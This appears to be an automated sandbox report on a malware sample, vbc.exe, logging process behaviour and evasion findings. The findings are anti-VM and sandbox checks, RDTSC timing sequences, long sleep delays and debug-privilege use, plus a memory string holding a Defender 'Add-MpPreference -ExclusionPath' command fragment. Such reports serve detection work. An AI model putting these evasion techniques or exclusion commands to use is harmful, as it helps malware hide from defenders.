Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 0.2.vbc.exe.2aec108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 6420, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\vbc.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vbc.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000002B48604 second address: 0000000002B4860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000002B4899E second address: 0000000002B489A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\vbc.exe TID: 6424	Thread sleep time: -38500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe TID: 6464	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6808	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 6612	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\vbc.exe

Code function: 8_2_004088D0 rdtsc

8_2_004088D0

Source: C:\Users\user\Desktop\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5311			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3100			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\vbc.exe	Thread delayed: delay time: 38500	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000B.00000000.276178140.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000B.00000000.276178140.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000000.277498776.0000000008CEA000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}froQQ
Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000000B.00000000.303948954.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.311106816.0000000008C73000.00000004.00000001.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000B.00000000.292121937.00000000069DA000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD002
Source: explorer.exe, 0000000B.00000000.280486172.000000000ECF7000.00000004.00000001.sdmp	Binary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}LL
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\vbc.exe

Code function: 8_2_004088D0 rdtsc

8_2_004088D0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0181C182 mov eax, dword ptr fs:[00000030h]	8_2_0181C182
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182A185 mov eax, dword ptr fs:[00000030h]	8_2_0182A185
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FB171 mov eax, dword ptr fs:[00000030h]	8_2_017FB171
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FB171 mov eax, dword ptr fs:[00000030h]	8_2_017FB171
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182FD9B mov eax, dword ptr fs:[00000030h]	8_2_0182FD9B
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182FD9B mov eax, dword ptr fs:[00000030h]	8_2_0182FD9B
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018235A1 mov eax, dword ptr fs:[00000030h]	8_2_018235A1
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FAD30 mov eax, dword ptr fs:[00000030h]	8_2_017FAD30
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018A8DF1 mov eax, dword ptr fs:[00000030h]	8_2_018A8DF1
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F9100 mov eax, dword ptr fs:[00000030h]	8_2_017F9100
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F9100 mov eax, dword ptr fs:[00000030h]	8_2_017F9100
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F9100 mov eax, dword ptr fs:[00000030h]	8_2_017F9100
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FB1E1 mov eax, dword ptr fs:[00000030h]	8_2_017FB1E1
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FB1E1 mov eax, dword ptr fs:[00000030h]	8_2_017FB1E1
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FB1E1 mov eax, dword ptr fs:[00000030h]	8_2_017FB1E1
